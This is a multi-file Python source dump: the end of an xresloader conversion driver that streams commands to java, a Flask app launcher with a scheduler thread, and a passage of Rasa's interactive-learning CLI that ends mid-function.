        In real-run mode it spawns `java -jar xresloader.jar --stdin` and
        streams command lines to its stdin; in --test mode it only prints the
        commands it would have run.
        """
        global exit_code
        java_options = ["java"]
        # CLI -j options are passed as "-<opt>"; XML java_option entries verbatim.
        if len(options.java_options) > 0:
            for java_option in options.java_options:
                java_options.append("-{0}".format(java_option))
        if len(xconv_options["java_options"]) > 0:
            for java_option in xconv_options["java_options"]:
                java_options.append(java_option)
        java_options.append("-Dfile.encoding={0}".format(java_encoding))
        java_options.append("-jar")
        java_options.append(xconv_options["xresloader_path"])
        java_options.append("--stdin")
        # Pick one command per output rule at a time so related outputs of an
        # item stay on the same worker.
        once_pick_count = len(xconv_options["output_matrix"]["outputs"])
        if once_pick_count <= 1:
            once_pick_count = 1
        pexec = None
        if not options.test:
            pexec = Popen(
                java_options, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=False
            )
            worker_thd_print_stdout = threading.Thread(
                target=print_stdout_func, args=[pexec]
            )
            worker_thd_print_stderr = threading.Thread(
                target=print_stderr_func, args=[pexec]
            )
            worker_thd_print_stdout.start()
            worker_thd_print_stderr.start()
            while True:
                # Pop commands from the shared queue under the lock.
                cmd_picker_lock.acquire()
                if len(cmd_list) <= 0:
                    cmd_picker_lock.release()
                    break
                for _ in range(0, once_pick_count):
                    if not cmd_list:
                        break
                    pexec.stdin.write(" ".join(cmd_list.pop()).encode(java_encoding))
                    pexec.stdin.write(os.linesep.encode(java_encoding))
                cmd_picker_lock.release()
                pexec.stdin.flush()
            # Closing stdin signals xresloader that no more work is coming.
            pexec.stdin.close()
            # NOTE(review): stdout is consumed both here and by the printer
            # thread started above — the two readers race; confirm intended.
            for output_line in pexec.stdout.readlines():
                print(output_line.decode(java_encoding))
            cmd_exit_code = pexec.wait()
            worker_thd_print_stdout.join()
            worker_thd_print_stderr.join()
            # NOTE(review): unsynchronized read-modify-write of the module
            # global from multiple workers; sums exit codes rather than
            # counting failures.
            exit_code = exit_code + cmd_exit_code
        else:
            # --test mode: collect the commands this worker would run and
            # print them without executing anything.
            this_thd_cmds = []
            while True:
                cmd_picker_lock.acquire()
                if len(cmd_list) <= 0:
                    cmd_picker_lock.release()
                    break
                for _ in range(0, once_pick_count):
                    if not cmd_list:
                        break
                    # python2 must use encode string to bytes or there will be messy code
                    # python3 must not use encode methed because it will transform string to bytes
                    if sys.version_info.major < 3 and not conv_compat_py2_write_buffer:
                        this_thd_cmds.append(
                            " ".join(cmd_list.pop()).encode(console_encoding)
                        )
                    else:
                        this_thd_cmds.append(" ".join(cmd_list.pop()))
                cmd_picker_lock.release()
            cprintf_stdout(
                [print_style.FC_GREEN],
                ('"{0}"' + os.linesep + "\t>{1}" + os.linesep).format(
                    '" "'.join(java_options), (os.linesep + "\t>").join(this_thd_cmds)
                ),
            )
    # Spawn the worker pool (size capped earlier at two threads).
    for i in range(0, options.parallelism):
        this_worker_thd = threading.Thread(target=worker_func, args=[i])
        this_worker_thd.start()
        all_worker_thread.append(this_worker_thd)
    # Wait for every worker to drain the command queue and exit.
    for thd in all_worker_thread:
        thd.join()
    # ----------------------------------------- conversion finished -----------------------------------------
    # NOTE(review): the "failed" figure is the sum of worker exit codes,
    # not a strict count of failed jobs.
    cprintf_stdout(
        [print_style.FC_MAGENTA],
        "[INFO] all jobs done. {0} job(s) failed.{1}".format(exit_code, os.linesep),
    )
if __name__ == "__main__":
    main()
    # exit_code aggregates the workers' java exit codes (0 == all succeeded).
    exit(exit_code)
|
main.py
|
import threading
from __init__ import app, configuration
import database.database_connection as database
# Initialise the database schema at import time, but only when a database
# connection is actually configured/required.
if database.connect_if_required():
    database.database_engine.init_app(app)
    database.database_engine.create_all()
def run_schedulers():
    """Run pending `schedule` jobs forever, polling once per second.

    Imports are function-local so scheduler dependencies only load inside
    the worker thread.
    """
    import time
    import schedule
    from server_settings.shutdown_scheduler import set_shutdown_time
    set_shutdown_time()
    while True:
        schedule.run_pending()
        time.sleep(1)
# Started at import time; daemon=True so it never blocks interpreter exit.
threading.Thread(target=run_schedulers, daemon=True).start()
if __name__ == '__main__':
    # Serve over HTTPS when SSL is configured; otherwise plain HTTP.
    if configuration.web_ssl:
        app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port, ssl_context=(configuration.ssl_cert_file, configuration.ssl_key_file))
    else:
        app.run(debug=configuration.debug_mode, host=configuration.web_host, port=configuration.web_port)
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import Any, Callable, Dict, List, Optional, Text, Tuple, Union
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, run, train, utils
from rasa.core.actions.action import (
ACTION_LISTEN_NAME,
default_action_names,
UTTER_PREFIX,
)
from rasa.core.channels.channel import UserMessage
from rasa.core.channels.channel import button_to_string, element_to_string
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT,
DEFAULT_SERVER_PORT,
DEFAULT_SERVER_URL,
REQUESTED_SLOT,
)
from rasa.core.domain import Domain
import rasa.core.events
from rasa.core.events import (
ActionExecuted,
ActionReverted,
BotUttered,
Event,
Restarted,
UserUttered,
UserUtteranceReverted,
)
from rasa.core.interpreter import INTENT_MESSAGE_PREFIX, NaturalLanguageInterpreter
from rasa.core.trackers import EventVerbosity, DialogueStateTracker
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH,
visualize_neighborhood,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.common import update_sanic_log_level
from rasa.utils.endpoints import EndpointConfig
# noinspection PyProtectedMember
from rasa.nlu.training_data import loading
from rasa.nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
from rasa.utils.io import create_path
logger = logging.getLogger(__name__)
# Maximum number of history steps rendered in the visualization.
MAX_VISUAL_HISTORY = 3
# Default export locations for data collected in an interactive session.
PATHS = {
    "stories": "data/stories.md",
    "nlu": "data/nlu.md",
    "backup": "data/nlu_interactive.md",
    "domain": "domain.yml",
}
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
# Sentinels for "reuse an action from this session" / "create a new action".
OTHER_ACTION = uuid.uuid4().hex
NEW_ACTION = uuid.uuid4().hex
# Templates created during this session; written to the domain on export.
NEW_TEMPLATES = {}
# The interactive loop uses these exceptions as control flow: handlers catch
# them to restart, fork, undo, or abort the running conversation.
class RestartConversation(Exception):
    """Exception used to break out the flow and restart the conversation."""
    pass
class ForkTracker(Exception):
    """Exception used to break out the flow and fork at a previous step.
    The tracker will be reset to the selected point in the past and the
    conversation will continue from there."""
    pass
class UndoLastStep(Exception):
    """Exception used to break out the flow and undo the last step.
    The last step is either the most recent user message or the most
    recent action run by the bot."""
    pass
class Abort(Exception):
    """Exception used to abort the interactive learning and exit."""
    pass
async def send_message(
    endpoint: EndpointConfig,
    sender_id: Text,
    message: Text,
    parse_data: Optional[Dict[Text, Any]] = None,
) -> Dict[Text, Any]:
    """Post a user utterance to the conversation identified by `sender_id`."""
    subpath = "/conversations/{}/messages".format(sender_id)
    payload = {
        "sender": UserUttered.type_name,
        "text": message,
        "parse_data": parse_data,
    }
    return await endpoint.request(json=payload, method="post", subpath=subpath)
async def request_prediction(
    endpoint: EndpointConfig, sender_id: Text
) -> Dict[Text, Any]:
    """Ask the core server for its next action prediction."""
    subpath = "/conversations/{}/predict".format(sender_id)
    return await endpoint.request(method="post", subpath=subpath)
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
    """Fetch the domain definition from the core server."""
    accept_json = {"Accept": "application/json"}
    return await endpoint.request(subpath="/domain", method="get", headers=accept_json)
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
    """Fetch the core server's status information."""
    return await endpoint.request(subpath="/status", method="get")
async def retrieve_tracker(
    endpoint: EndpointConfig,
    sender_id: Text,
    verbosity: EventVerbosity = EventVerbosity.ALL,
) -> Dict[Text, Any]:
    """Fetch the tracker for `sender_id`, including events per `verbosity`."""
    subpath = "/conversations/{}/tracker?include_events={}".format(
        sender_id, verbosity.name
    )
    accept_json = {"Accept": "application/json"}
    return await endpoint.request(subpath=subpath, method="get", headers=accept_json)
async def send_action(
    endpoint: EndpointConfig,
    sender_id: Text,
    action_name: Text,
    policy: Optional[Text] = None,
    confidence: Optional[float] = None,
    is_new_action: bool = False,
) -> Dict[Text, Any]:
    """Log an action to a conversation.

    Asks the core server to execute `action_name`; when execution fails for
    an action created during this session, the action is logged as a bare
    event instead (after warning the user).
    """
    payload = ActionExecuted(action_name, policy, confidence).as_dict()
    subpath = "/conversations/{}/execute".format(sender_id)
    try:
        return await endpoint.request(json=payload, method="post", subpath=subpath)
    except ClientError:
        if is_new_action:
            if action_name in NEW_TEMPLATES:
                # New utterance action with a template defined this session.
                warning_questions = questionary.confirm(
                    "WARNING: You have created a new action: '{0}', "
                    "with matching template: '{1}'. "
                    "This action will not return its message in this session, "
                    "but the new utterance will be saved to your domain file "
                    "when you exit and save this session. "
                    "You do not need to do anything further. "
                    "".format(action_name, [*NEW_TEMPLATES[action_name]][0])
                )
                await _ask_questions(warning_questions, sender_id, endpoint)
            else:
                # New custom action the action server does not know about yet.
                warning_questions = questionary.confirm(
                    "WARNING: You have created a new action: '{}', "
                    "which was not successfully executed. "
                    "If this action does not return any events, "
                    "you do not need to do anything. "
                    "If this is a custom action which returns events, "
                    "you are recommended to implement this action "
                    "in your action server and try again."
                    "".format(action_name)
                )
                await _ask_questions(warning_questions, sender_id, endpoint)
            # Record the action as executed even though it could not run.
            payload = ActionExecuted(action_name).as_dict()
            return await send_event(endpoint, sender_id, payload)
        else:
            logger.error("failed to execute action!")
            raise
async def send_event(
    endpoint: EndpointConfig,
    sender_id: Text,
    evt: Union[List[Dict[Text, Any]], Dict[Text, Any]],
) -> Dict[Text, Any]:
    """Append one event (or a list of events) to a conversation's tracker."""
    subpath = "/conversations/{}/tracker/events".format(sender_id)
    return await endpoint.request(method="post", subpath=subpath, json=evt)
def format_bot_output(message: BotUttered) -> Text:
    """Render a bot message (text plus attachments) for the history table."""
    data = message.data or {}
    pieces = [message.text or ""]
    # Text only — nothing further to append.
    if not data:
        return pieces[0]
    if data.get("image"):
        pieces.append("\nImage: " + data.get("image"))
    if data.get("attachment"):
        pieces.append("\nAttachment: " + data.get("attachment"))
    if data.get("buttons"):
        pieces.append("\nButtons:")
        for idx, button in enumerate(data.get("buttons")):
            pieces.append("\n" + button_to_string(button, idx))
    if data.get("elements"):
        pieces.append("\nElements:")
        for idx, element in enumerate(data.get("elements")):
            pieces.append("\n" + element_to_string(element, idx))
    if data.get("quick_replies"):
        pieces.append("\nQuick replies:")
        for idx, element in enumerate(data.get("quick_replies")):
            pieces.append("\n" + element_to_string(element, idx))
    return "".join(pieces)
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
    """Return the most recent user message event, or `None` if there is none."""
    # FIX: drop the unused `enumerate` index from the original loop.
    for event in reversed(events):
        if event.get("event") == UserUttered.type_name:
            return event
    return None
def all_events_before_latest_user_msg(
    events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
    """Return the prefix of `events` up to (excluding) the last user message."""
    cutoff = None
    for offset, event in enumerate(reversed(events)):
        if event.get("event") == UserUttered.type_name:
            cutoff = offset + 1
            break
    # No user message at all — keep everything.
    if cutoff is None:
        return events
    return events[:-cutoff]
async def _ask_questions(
    questions: Union[Form, Question],
    sender_id: Text,
    endpoint: EndpointConfig,
    is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
    """Ask the user a question, if Ctrl-C is pressed provide user with menu."""
    while True:
        answers = questions.ask()
        # `None` means the prompt was cancelled (e.g. via Ctrl-C).
        if answers is not None and not is_abort(answers):
            return answers
        # Show the exit menu; a falsy result means "do not retry".
        if not await _ask_if_quit(sender_id, endpoint):
            return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(
p.get("confidence"), p.get("name")
)
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(sender_id: Text, endpoint: EndpointConfig) -> Text:
    """Prompt the user to type the name of a new intent."""
    prompt = questionary.text("Please type the intent name:")
    return await _ask_questions(prompt, sender_id, endpoint)
async def _request_free_text_action(sender_id: Text, endpoint: EndpointConfig) -> Text:
    """Prompt the user to type the name of a new action."""
    prompt = questionary.text("Please type the action name:")
    return await _ask_questions(prompt, sender_id, endpoint)
async def _request_free_text_utterance(
    sender_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
    """Prompt for the message text of a newly created utter template."""
    prompt = questionary.text(
        "Please type the message for your new utter_template '{}':".format(action)
    )
    return await _ask_questions(prompt, sender_id, endpoint)
async def _request_selection_from_intents(
    intents: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
    """Let the user pick one intent from the given choice list."""
    selection = questionary.select("What intent is it?", choices=intents)
    return await _ask_questions(selection, sender_id, endpoint)
async def _request_fork_point_from_list(
    forks: List[Dict[Text, Text]], sender_id: Text, endpoint: EndpointConfig
) -> Text:
    """Let the user pick the user message before which to fork."""
    selection = questionary.select(
        "Before which user message do you want to fork?", choices=forks
    )
    return await _ask_questions(selection, sender_id, endpoint)
async def _request_fork_from_user(
    sender_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
    """Take in a conversation and ask at which point to fork the conversation.
    Returns the list of events that should be kept. Forking means, the
    conversation will be reset and continued from this previous point."""
    tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
    choices = []
    # Offer every user message as a candidate fork point; index into the
    # event list is kept as the choice value.
    for i, e in enumerate(tracker.get("events", [])):
        if e.get("event") == UserUttered.type_name:
            choices.append({"name": e.get("text"), "value": i})
    # Show the most recent messages first.
    fork_idx = await _request_fork_point_from_list(
        list(reversed(choices)), sender_id, endpoint
    )
    if fork_idx is not None:
        # Keep everything before the chosen user message.
        return tracker.get("events", [])[: int(fork_idx)]
    else:
        return None
async def _request_intent_from_user(
    latest_message, intents, sender_id, endpoint
) -> Dict[Text, Any]:
    """Take in latest message and ask which intent it should have been.
    Returns the intent dict that has been selected by the user."""
    predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
    predicted_intents = {p["name"] for p in predictions}
    # Ensure every known intent shows up, even ones the NLU model did not rank.
    for i in intents:
        if i not in predicted_intents:
            predictions.append({"name": i, "confidence": 0.0})
    # convert intents to ui list and add <other> as a free text alternative
    choices = [
        {"name": "<create_new_intent>", "value": OTHER_INTENT}
    ] + _selection_choices_from_intent_prediction(predictions)
    intent_name = await _request_selection_from_intents(choices, sender_id, endpoint)
    if intent_name == OTHER_INTENT:
        # User opted to create a brand-new intent; full confidence by definition.
        intent_name = await _request_free_text_intent(sender_id, endpoint)
        selected_intent = {"name": intent_name, "confidence": 1.0}
    else:
        # returns the selected intent with the original probability value
        selected_intent = next(
            (x for x in predictions if x["name"] == intent_name), {"name": None}
        )
    return selected_intent
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
    """Print the conversation history (and current slots) for the user."""
    tracker_dump = await retrieve_tracker(
        endpoint, sender_id, EventVerbosity.AFTER_RESTART
    )
    events = tracker_dump.get("events", [])
    slot_strs = _slot_history(tracker_dump)
    print("------")
    print("Chat History\n")
    print(_chat_history_table(events))
    if slot_strs:
        print("\n")
        print("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
    print("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
    """Create a table containing bot and user messages.

    Also includes additional information, like any events and
    prediction probabilities."""
    def wrap(txt: Text, max_width: int) -> Text:
        # Hard-wrap text to the column width, preserving internal whitespace.
        return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
    def colored(txt: Text, color: Text) -> Text:
        # Wrap text in colorclass markup, e.g. "{autoblue}...{/autoblue}".
        return "{" + color + "}" + txt + "{/" + color + "}"
    def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
        # Markdown rendering of the message plus the recognised intent.
        intent = user_event.intent or {}
        intent_name = intent.get("name", "")
        _confidence = intent.get("confidence", 1.0)
        _md = _as_md_message(user_event.parse_data)
        _lines = [
            colored(wrap(_md, max_width), "hired"),
            "intent: {} {:03.2f}".format(intent_name, _confidence),
        ]
        return "\n".join(_lines)
    def bot_width(_table: AsciiTable) -> int:
        return _table.column_max_width(1)
    def user_width(_table: AsciiTable) -> int:
        return _table.column_max_width(3)
    def add_bot_cell(data, cell):
        data.append([len(data), Color(cell), "", ""])
    def add_user_cell(data, cell):
        data.append([len(data), "", "", Color(cell)])
    # prints the historical interactions between the bot and the user,
    # to help with correctly identifying the action
    table_data = [
        [
            "# ",
            Color(colored("Bot ", "autoblue")),
            " ",
            Color(colored("You ", "hired")),
        ]
    ]
    table = SingleTable(table_data, "Chat History")
    # Consecutive bot-side lines are buffered here and flushed into one cell
    # whenever a user message arrives.
    bot_column = []
    tracker = DialogueStateTracker.from_dict("any", events)
    applied_events = tracker.applied_events()
    # FIX: dropped the unused `enumerate` index from the original loop.
    for event in applied_events:
        if isinstance(event, ActionExecuted):
            bot_column.append(colored(event.action_name, "autocyan"))
            if event.confidence is not None:
                bot_column[-1] += colored(
                    " {:03.2f}".format(event.confidence), "autowhite"
                )
        elif isinstance(event, UserUttered):
            if bot_column:
                text = "\n".join(bot_column)
                add_bot_cell(table_data, text)
                bot_column = []
            msg = format_user_msg(event, user_width(table))
            add_user_cell(table_data, msg)
        elif isinstance(event, BotUttered):
            wrapped = wrap(format_bot_output(event), bot_width(table))
            bot_column.append(colored(wrapped, "autoblue"))
        else:
            # Any other event is shown via its story-string representation.
            if event.as_story_string():
                bot_column.append(wrap(event.as_story_string(), bot_width(table)))
    if bot_column:
        text = "\n".join(bot_column)
        add_bot_cell(table_data, text)
    table.inner_heading_row_border = False
    table.inner_row_border = True
    table.inner_column_border = False
    table.outer_border = False
    table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
    return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
    """Write stories and nlu data to file.

    Asks the user for export locations, then dumps the session's stories,
    NLU examples, and domain additions to those paths.
    """
    story_path, nlu_path, domain_path = _request_export_info()
    tracker = await retrieve_tracker(endpoint, sender_id)
    events = tracker.get("events", [])
    await _write_stories_to_file(story_path, events)
    await _write_nlu_to_file(nlu_path, events)
    await _write_domain_to_file(domain_path, events, endpoint)
    logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
    """Display the exit menu.

    Return `True` if the previous question should be retried."""
    answer = questionary.select(
        message="Do you want to stop?",
        choices=[
            Choice("Continue", "continue"),
            Choice("Undo Last", "undo"),
            Choice("Fork", "fork"),
            Choice("Start Fresh", "restart"),
            Choice("Export & Quit", "quit"),
        ],
    ).ask()

    if not answer or answer == "quit":
        # this is also the default answer if the user presses Ctrl-C
        await _write_data_to_file(sender_id, endpoint)
        raise Abort()

    if answer == "continue":
        # in this case we will just return, and the original
        # question will get asked again
        return True

    # Remaining menu entries are implemented as control-flow exceptions
    # handled by the interactive loop.
    exception_for_answer = {
        "undo": UndoLastStep,
        "fork": ForkTracker,
        "restart": RestartConversation,
    }
    chosen_exception = exception_for_answer.get(answer)
    if chosen_exception is not None:
        raise chosen_exception()
async def _request_action_from_user(
    predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
    """Ask the user to correct an action prediction.

    Returns the chosen action name and whether it is a newly created action."""
    await _print_history(sender_id, endpoint)

    # One choice per predicted action, highest-level data first in the menu.
    choices = [
        {
            "name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
            "value": a.get("action"),
        }
        for a in predictions
    ]

    tracker = await retrieve_tracker(endpoint, sender_id)
    events = tracker.get("events", [])

    session_actions_all = [a["name"] for a in _collect_actions(events)]
    session_actions_unique = list(set(session_actions_all))
    old_actions = [action["value"] for action in choices]
    # Actions created earlier in this session but not predicted this turn are
    # offered too; their values are tagged with the OTHER_ACTION prefix so we
    # can recognise them below.
    new_actions = [
        {"name": action, "value": OTHER_ACTION + action}
        for action in session_actions_unique
        if action not in old_actions
    ]
    choices = (
        [{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
    )
    question = questionary.select("What is the next action of the bot?", choices)

    action_name = await _ask_questions(question, sender_id, endpoint)
    is_new_action = action_name == NEW_ACTION

    if is_new_action:
        # create new action
        action_name = await _request_free_text_action(sender_id, endpoint)
        if action_name.startswith(UTTER_PREFIX):
            utter_message = await _request_free_text_utterance(
                sender_id, endpoint, action_name
            )
            NEW_TEMPLATES[action_name] = {utter_message: ""}
    elif action_name.startswith(OTHER_ACTION):
        # BUGFIX: the prefix length was hard-coded as 32 (the current length
        # of OTHER_ACTION); use the prefix itself so a changed marker cannot
        # silently break the comparison and the slice.
        # action was newly created in the session, but not this turn
        is_new_action = True
        action_name = action_name[len(OTHER_ACTION):]

    print("Thanks! The bot will now run {}.\n".format(action_name))
    return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
    """Request file path and export stories & nlu data to that path"""
    # export training data and quit
    questions = questionary.form(
        export_stories=questionary.text(
            message="Export stories to (if file exists, this "
            "will append the stories)",
            default=PATHS["stories"],
        ),
        export_nlu=questionary.text(
            message="Export NLU data to (if file exists, this will "
            "merge learned data with previous training examples)",
            default=PATHS["nlu"],
        ),
        export_domain=questionary.text(
            message="Export domain file to (if file exists, this "
            "will be overwritten)",
            default=PATHS["domain"],
        ),
    )

    answers = questions.ask()
    if not answers:
        # Prompt was cancelled (e.g. via Ctrl-C).
        raise Abort()

    return (
        answers["export_stories"],
        answers["export_nlu"],
        answers["export_domain"],
    )
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
    """Collect the message text and parsed data from the UserMessage events
    into a list"""
    from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
    from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
    from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor

    # Entities marked by these pretrained extractors must not be written to
    # the NLU training data, since they are not learned from annotations.
    excluded_extractors = [
        DucklingHTTPExtractor.__name__,
        SpacyEntityExtractor.__name__,
        MitieEntityExtractor.__name__,
    ]
    logger.debug(
        "Exclude entity marking of following extractors"
        " {} when writing nlu data "
        "to file.".format(excluded_extractors)
    )

    msgs = []
    for event in events:
        if event.get("event") == UserUttered.type_name:
            data = event.get("parse_data", {})
            # BUGFIX: the original called `data["entities"].remove(entity)`
            # while iterating the same list, which skips the element right
            # after each removal (consecutive excluded entities survived).
            # Build a filtered list instead.
            data["entities"] = [
                entity
                for entity in data.get("entities", [])
                if entity.get("extractor") not in excluded_extractors
            ]

            msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
            msgs.append(msg)

    return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
    """Collect all the `ActionExecuted` events into a list."""
    action_event = ActionExecuted.type_name
    return [event for event in events if event.get("event") == action_event]
async def _write_stories_to_file(
    export_story_path: Text, events: List[Dict[Text, Any]]
) -> None:
    """Write the conversation of the sender_id to the file paths."""
    sub_conversations = _split_conversation_at_restarts(events)

    create_path(export_story_path)

    # Append if the target file already exists, otherwise create it.
    write_mode = "a" if os.path.exists(export_story_path) else "w"

    with open(export_story_path, write_mode, encoding="utf-8") as story_file:
        for conversation in sub_conversations:
            parsed_events = rasa.core.events.deserialise_events(conversation)
            story = Story.from_events(parsed_events)
            story_file.write("\n" + story.as_story_string(flat=True))
async def _write_nlu_to_file(
    export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
    """Write the nlu data of the sender_id to the file paths."""
    from rasa.nlu.training_data import TrainingData

    msgs = _collect_messages(events)

    # noinspection PyBroadException
    try:
        previous_examples = loading.load_data(export_nlu_path)
    except Exception as e:
        logger.exception("An exception occurred while trying to load the NLU data.")
        # The target file exists but could not be parsed -- ask the user for
        # an alternative location instead of destroying data we cannot merge.
        export_nlu_path = questionary.text(
            message="Could not load existing NLU data, please "
            "specify where to store NLU data learned in "
            "this session (this will overwrite any "
            "existing file). {}".format(str(e)),
            default=PATHS["backup"],
        ).ask()
        if export_nlu_path is None:
            # User cancelled the prompt (e.g. Ctrl-C): skip the NLU export.
            return
        previous_examples = TrainingData()

    nlu_data = previous_examples.merge(TrainingData(msgs))

    # need to guess the format of the file before opening it to avoid a read
    # in a write
    if loading.guess_format(export_nlu_path) in {"md", "unk"}:
        fformat = "md"
    else:
        fformat = "json"

    with open(export_nlu_path, "w", encoding="utf-8") as f:
        if fformat == "md":
            f.write(nlu_data.as_markdown())
        else:
            f.write(nlu_data.as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
    domain_path: Text, events: List[Dict[Text, Any]], endpoint: EndpointConfig
) -> None:
    """Write an updated domain file to the file path."""
    create_path(domain_path)

    # Merge the server's current domain with what was learned this session.
    domain = await retrieve_domain(endpoint)
    old_domain = Domain.from_dict(domain)

    messages = _collect_messages(events)
    actions = _collect_actions(events)
    templates = NEW_TEMPLATES

    # TODO for now there is no way to distinguish between action and form
    # Default actions are built in and must not be written to the domain.
    collected_actions = list(
        {e["name"] for e in actions if e["name"] not in default_action_names()}
    )

    new_domain = Domain(
        intents=_intents_from_messages(messages),
        entities=_entities_from_messages(messages),
        slots=[],
        templates=templates,
        action_names=collected_actions,
        form_names=[],
    )

    old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
    endpoint: EndpointConfig,
    sender_id: Text,
    sender_ids: List[Text],
    plot_file: Optional[Text],
) -> None:
    """Predict and validate actions until we need to wait for a user msg."""
    listen = False
    while not listen:
        result = await request_prediction(endpoint, sender_id)
        predictions = result.get("scores")
        # Pick the action with the highest predicted score.
        probabilities = [prediction["score"] for prediction in predictions]
        pred_out = int(np.argmax(probabilities))
        action_name = predictions[pred_out].get("action")
        policy = result.get("policy")
        confidence = result.get("confidence")

        await _print_history(sender_id, endpoint)
        # Plot with the predicted (not yet confirmed) action appended.
        await _plot_trackers(
            sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
        )

        # `_validate_action` returns True once `action_listen` was executed,
        # i.e. the bot now waits for user input.
        listen = await _validate_action(
            action_name, policy, confidence, predictions, endpoint, sender_id
        )

        await _plot_trackers(sender_ids, plot_file, endpoint)

    tracker_dump = await retrieve_tracker(
        endpoint, sender_id, EventVerbosity.AFTER_RESTART
    )
    events = tracker_dump.get("events", [])
    if len(events) >= 2:
        last_event = events[-2]  # last event before action_listen

        # if bot message includes buttons the user will get a list choice to reply
        # the list choice is displayed in place of action listen
        if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
            "buttons", None
        ):
            data = last_event["data"]
            message = last_event.get("text", "")
            choices = [
                button_to_string(button, idx)
                for idx, button in enumerate(data.get("buttons"))
            ]

            question = questionary.select(message, choices)
            button_payload = cliutils.payload_from_button_question(question)
            await send_message(endpoint, sender_id, button_payload)
async def _correct_wrong_nlu(
    corrected_nlu: Dict[Text, Any],
    events: List[Dict[Text, Any]],
    endpoint: EndpointConfig,
    sender_id: Text,
) -> None:
    """A wrong NLU prediction got corrected, update core's tracker."""
    corrected_message = latest_user_message(events)
    if corrected_message is None:
        raise Exception("Failed to correct NLU data. User message not found.")
    corrected_message["parse_data"] = corrected_nlu

    # `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
    # have to replay it.
    events_to_send = [
        UserUtteranceReverted().as_dict(),
        ActionExecuted(ACTION_LISTEN_NAME).as_dict(),
        corrected_message,
    ]
    await send_event(endpoint, sender_id, events_to_send)
async def _correct_wrong_action(
    corrected_action: Text,
    endpoint: EndpointConfig,
    sender_id: Text,
    is_new_action: bool = False,
) -> None:
    """A wrong action prediction got corrected, update core's tracker.

    Args:
        corrected_action: name of the action the user chose instead.
        endpoint: Rasa Core server to notify.
        sender_id: conversation whose tracker should be updated.
        is_new_action: `True` if the action was created during this session.
    """
    await send_action(
        endpoint, sender_id, corrected_action, is_new_action=is_new_action
    )
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
